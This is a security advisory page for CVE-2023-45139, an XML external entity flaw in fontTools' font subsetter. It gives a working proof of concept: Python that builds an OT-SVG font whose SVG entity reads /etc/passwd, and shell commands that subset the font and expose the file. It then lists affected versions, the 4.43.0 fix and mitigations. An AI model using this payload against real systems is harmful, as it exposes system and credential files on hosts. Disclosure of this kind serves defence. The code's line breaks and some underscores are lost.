CVE-2023-45139: fonttools XML External Entity Injection (XXE) Vulnerability

Published Jan 9, 2024
·
Updated

Summary

As of fonttools>=4.28.2 the subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed.

This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system.

PoC

The vulnerability can be reproduced following the bellow steps on a unix based system.

1. Build a OT-SVG font which includes a external entity in the SVG table which resolves a local file. In our testing we utilised /etc/passwd for our POC file to include and modified an existing subset integration test to build the POC font - see bellow.

python

from string import asciiletters from fontTools.fontBuilder import FontBuilder from fontTools.pens.ttGlyphPen import TTGlyphPen from fontTools.ttLib import newTable

XXESVG = """\ <?xml version="1.0"?> <!DOCTYPE svg [<!ENTITY test SYSTEM 'file:///etc/passwd'>]> <svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <g id="glyph1"> <text font-size="10" x="0" y="10">&test;</text> </g> </svg> """

def main(): # generate a random TTF font with an SVG table glyphorder = [".notdef"] + list(asciiletters) pen = TTGlyphPen(glyphSet=None) pen.moveTo((0, 0)) pen.lineTo((0, 500)) pen.lineTo((500, 500)) pen.lineTo((500, 0)) pen.closePath() glyph = pen.glyph() glyphs = {g: glyph for g in glyphorder}

fb = FontBuilder(unitsPerEm=1024, isTTF=True) fb.setupGlyphOrder(glyphorder) fb.setupCharacterMap({ord(c): c for c in asciiletters}) fb.setupGlyf(glyphs) fb.setupHorizontalMetrics({g: (500, 0) for g in glyphorder}) fb.setupHorizontalHeader() fb.setupOS2() fb.setupPost() fb.setupNameTable({"familyName": "TestSVG", "styleName": "Regular"})

svgtable = newTable("SVG ") svgtable.docList = [ (XXESVG, 1, 12) ] fb.font["SVG "] = svgtable

fb.font.save('poc-payload.ttf')

if name == 'main': main()

2. Subset the font with an affected version of fontTools - we tested on fonttools==4.42.1 and fonttools==4.28.2 - using the following flags (which just ensure the malicious glyph is mapped by the font and not discard in the subsetting process):

shell pyftsubset poc-payload.ttf --output-file="poc-payload.subset.ttf" --unicodes="" --ignore-missing-glyphs

3. Read the parsed SVG table in the subsetted font:

shell ttx -t SVG poc-payload.subset.ttf && cat poc-payload.subset.ttx

Observed the included contents of the /etc/passwd file.

Impact

Note the final severity is dependant on the environment fontTools is running in.

- The vulnerability has the most impact on consumers of fontTools who leverage the subsetting utility to subset untrusted OT-SVG fonts where the vulnerability may be exploited to read arbitrary files from the filesystem of the host fonttools is running on

Possible Mitigations

There may be other ways to mitigate the issue, but some suggestions:

1. Set the resolveentities=False flag on parsing methods 2. Consider further methods of disallowing doctype declarations 3. Consider recursive regex matching

Other sources

fontTools is a library for manipulating fonts, written in Python. The subsetting module has a XML External Entity Injection (XXE) vulnerability which allows an attacker to resolve arbitrary entities when a candidate font (OT-SVG fonts), which contains a SVG table, is parsed. This allows attackers to include arbitrary files from the filesystem fontTools is running on or make web requests from the host system. This vulnerability has been patched in version 4.43.0.

NVD

Affected Software

2 affected componentsFixes available
pip/fonttools>=4.28.2<4.43.0
4.43.0
fontTools Fonttools Python>=4.28.2<4.43.0

Event History

Jan 9, 2024
Advisory Published
via GitHub·04:01 PM
Jan 10, 2024
CVE Published
via MITRE·04:03 PM
Data Sourced
via MITRE·04:03 PM
DescriptionSeverityWeakness
Mar 8, 2024
News Published
via The Register·03:57 AM
News Published
via The Register·04:00 AM

Peer vulnerabilities

Found alongside the following vulnerabilities.

Free Weekly Intel

Don't miss critical vulnerabilities

Join thousands of security professionals who receive our weekly digest of trending CVEs, zero-days, and exploited vulnerabilities.

No spam. Unsubscribe anytime.

Frequently Asked Questions

1

What is the severity of CVE-2023-45139?

CVE-2023-45139 is considered a moderate severity vulnerability due to the potential for XML External Entity Injection.

2

How do I fix CVE-2023-45139?

To fix CVE-2023-45139, upgrade fonttools to version 4.43.0 or later.

3

What types of software are affected by CVE-2023-45139?

CVE-2023-45139 affects fonttools versions between 4.28.2 and 4.43.0.

4

What is XML External Entity Injection in CVE-2023-45139?

XML External Entity Injection in CVE-2023-45139 allows attackers to exploit XML parsers, leading to potential data exposure or manipulation.

5

Can CVE-2023-45139 be exploited by any attacker?

Yes, CVE-2023-45139 can be exploited by attackers who can submit crafted fonts containing malicious SVG content.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203